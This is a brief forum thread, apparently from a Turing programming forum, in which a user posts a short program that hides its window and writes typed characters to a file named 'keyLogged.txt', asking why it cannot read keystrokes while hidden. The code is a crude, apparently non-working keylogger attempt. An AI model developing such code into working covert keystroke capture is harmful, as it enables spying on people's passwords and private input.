[Site Home] [Forum Home] [Articles] [File DB] [News Archives]

Programming -> Input And Hide Window


(View original topic)


syb - May-16-2007 server time
I wouldn't know. I never got that far in turning.

vahnx - May-20-2006 server time
Is it possible to read keystrokes while the window is hidden? It says it's impossible! Here's my code:

CODE

var file : int
var ch : char
Window.Hide (defWinID)

loop
   if hasch then
       ch := getchar
       put ch ..
       open : file, "keyLogged.txt", put, mod, seek
       seek : file, *
       put : file, ch ..
       close : file
   end if
end loop

(Showing 50 last posts, newest on top)